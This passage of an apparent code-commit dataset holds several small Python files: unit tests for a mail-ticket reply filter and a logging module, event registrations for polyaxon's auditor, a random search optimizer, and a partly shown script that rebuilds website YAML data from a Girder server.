"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Test to verify the new functionality<commit_after>import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
|
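The pattern this test leans on, mock.create_autospec plus return_value, enforces the real call signatures rather than accepting anything like a bare Mock would. A self-contained demonstration with a stand-in class (MailTicket itself is not needed to show the behaviour):

import mock

class Message(object):
    def get_from(self):
        raise NotImplementedError

msg = mock.create_autospec(Message)
msg.get_from.return_value = 'mail.extern@mail.com'
assert msg.get_from() == 'mail.extern@mail.com'
msg.get_from.assert_called_once_with()
# Passing arguments the spec does not accept raises TypeError:
# msg.get_from('extra')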
2660658a556d9f9bf511f18173b009db460b774b
|
tests/test_log.py
|
tests/test_log.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
Add test case for log.py.
|
Add test case for log.py.
|
Python
|
mit
|
ujiro99/auto_logger,ujiro99/auto_logger
|
Add test case for log.py.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
<commit_before><commit_msg>Add test case for log.py.<commit_after>
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
Add test case for log.py.#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
<commit_before><commit_msg>Add test case for log.py.<commit_after>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import io
from logging import StreamHandler
from unittest import TestCase
from logger import log
class TestLog(TestCase):
def test_set_level(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.WARN)
log.i("message")
self.assertEqual(out.getvalue(), "")
log.set_level(log.Level.INFO)
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d("message")
self.assertEqual(out.getvalue(), "message\n")
def test_d__byte(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.set_level(log.Level.DEBUG)
log.d(b'message')
self.assertEqual(out.getvalue(), "message\n")
def test_i(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.i("message")
self.assertEqual(out.getvalue(), "message\n")
def test_w(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.w("message")
self.assertEqual(out.getvalue(), "message\n")
def test_e(self):
out = io.StringIO()
log.logger.addHandler(StreamHandler(stream=out))
log.e("message")
self.assertEqual(out.getvalue(), "message\n")
|
|
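The tests pin down the contract of the logger.log module without showing it. One plausible shape that satisfies the assertions is sketched below; it is a reconstruction from the expectations (a Level enum, set_level, and d() accepting bytes), not the project's actual source.

import logging
from enum import Enum

logger = logging.getLogger('auto_logger')

class Level(Enum):
    DEBUG = logging.DEBUG
    INFO = logging.INFO
    WARN = logging.WARNING
    ERROR = logging.ERROR

def set_level(level):
    logger.setLevel(level.value)

def _text(message):
    # test_d__byte expects bytes messages to be written out as text
    return message.decode() if isinstance(message, bytes) else message

def d(message): logger.debug(_text(message))
def i(message): logger.info(_text(message))
def w(message): logger.warning(_text(message))
def e(message): logger.error(_text(message))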
7aa378e269d7c72cd36e79ab0fcfcda67e4dd261
|
polyaxon/auditor/events/experiment_group.py
|
polyaxon/auditor/events/experiment_group.py
|
import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
Add auditor experiment group's events
|
Add auditor experiment group's events
|
Python
|
apache-2.0
|
polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon
|
Add auditor experiment group's events
|
import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
<commit_before><commit_msg>Add auditor experiment group's events<commit_after>
|
import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
Add auditor experiment group's eventsimport auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
<commit_before><commit_msg>Add auditor experiment group's events<commit_after>import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
|
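The module above assumes an auditor.register() keyed on each event class's type. A minimal sketch of that registry pattern, reduced to the shape the file depends on; the real polyaxon auditor also validates and dispatches events, which is omitted here.

_registry = {}

class Event(object):
    type = None

    def __init__(self, **data):
        self.data = data

def register(event_class):
    # Lookups (and duplicate detection) key on the event type
    assert event_class.type not in _registry, event_class.type
    _registry[event_class.type] = event_class

def record(event_type, **data):
    return _registry[event_type](**data)

class ExperimentGroupCreatedEvent(Event):
    type = 'experiment_group.created'

register(ExperimentGroupCreatedEvent)
event = record('experiment_group.created', id=42)
print(event.data)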
d58f249191f3e7746d68317c9fccc5a92601b8d0
|
metaopt/optimizer/randomsearch.py
|
metaopt/optimizer/randomsearch.py
|
# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
Add first version of a random search optimizer
|
Add first version of a random search optimizer
|
Python
|
bsd-3-clause
|
cigroup-ol/metaopt,cigroup-ol/metaopt,cigroup-ol/metaopt
|
Add first version of a random search optimizer
|
# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
<commit_before><commit_msg>Add first version of a random search optimizer<commit_after>
|
# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
Add first version of a random search optimizer# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
<commit_before><commit_msg>Add first version of a random search optimizer<commit_after># -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
|
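optimize() relies on the invoker raising StoppedError to end the sampling loop. A toy invoker makes that control flow runnable in isolation; every class below is a stand-in for the metaopt interfaces, written only to show the pattern.

import random

class StoppedError(Exception):
    pass

class BudgetInvoker(object):
    """Invokes the objective until a fixed evaluation budget is spent."""
    def __init__(self, budget):
        self.budget = budget

    def invoke(self, caller, args):
        if self.budget <= 0:
            raise StoppedError()
        self.budget -= 1
        caller.on_result(sum(a * a for a in args), args)  # toy objective

class RandomSearch(object):
    def __init__(self):
        self.best = (None, None)

    def optimize(self, invoker):
        try:
            while True:
                invoker.invoke(self, [random.uniform(-1, 1) for _ in range(2)])
        except StoppedError:
            return self.best[0]

    def on_result(self, fitness, args):
        if self.best[1] is None or fitness < self.best[1]:
            self.best = (args, fitness)

print(RandomSearch().optimize(BudgetInvoker(100)))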
53c4ab4ae1d463994f4b730295450b3297ecd094
|
tools/regenerate_yamls.py
|
tools/regenerate_yamls.py
|
import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
Add script for regenerating yaml files
|
Add script for regenerating yaml files
|
Python
|
mit
|
rensimlab/rensimlab.github.io,rensimlab/rensimlab.github.io,rensimlab/rensimlab.github.io
|
Add script for regenerating yaml files
|
import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
<commit_before><commit_msg>Add script for regenerating yaml files<commit_after>
|
import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
Add script for regenerating yaml filesimport os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
